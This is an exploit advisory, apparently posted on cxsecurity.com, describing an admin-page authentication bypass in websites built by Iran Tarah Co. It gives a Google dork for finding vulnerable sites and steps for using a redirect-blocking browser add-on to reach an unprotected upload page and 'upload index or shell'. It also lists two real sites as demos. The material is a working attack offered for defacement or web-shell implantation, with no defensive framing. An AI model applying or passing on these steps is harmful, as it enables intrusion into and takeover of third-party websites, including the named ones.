Iran Tarah® Co. Upload Index Admin Page Bypass

2016-03-12 / 2016-05-17
Credit: 1337r00t
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Admin Page Bypass [ Iran Tarah® Co.] Upload Index |[+] |[+] Exploit Author: 1337r00t - T34m D4rkn3ss R00m Fr0m Saudi Arabia |[+] |[+] Vendor Homepage: http://www.irantarah.com/ |[+] |[+] Google Dork: inurl:/admin/ " تمامی حقوق مادی و معنوی وب سایت متعلق به شرکت ایران طراح (داده گستر اقلیما ) می باشد . |[+] |[+] Tested on: Windows 10 , Mozilla Firefox |[+] |[+] Date: 12/3/2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox |[+] |[+] |[+] Admin Url :- |[+] http://[$host]/admin/login.php |[+] |[+] |[+] |[+] 1- Run Tool NoRedirect |[+] 2- Add Site New |[+] 3- Add: ^[$site]/admin/login.php |[+] 4- Path Upload The Site : [$site]/admin/Upload.php |[+] 5- Upload Index Or Shell |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+] www.namisteelco.com/admin/login.php |[+] www.jsba.ir/admin/login.php |[+] |--------------------------------------------------------------| |[+] My Accounts :- |[+] |[+] Twitter:1337r00t |[+] Instagram: 1337r00t |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : 1337r00t |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top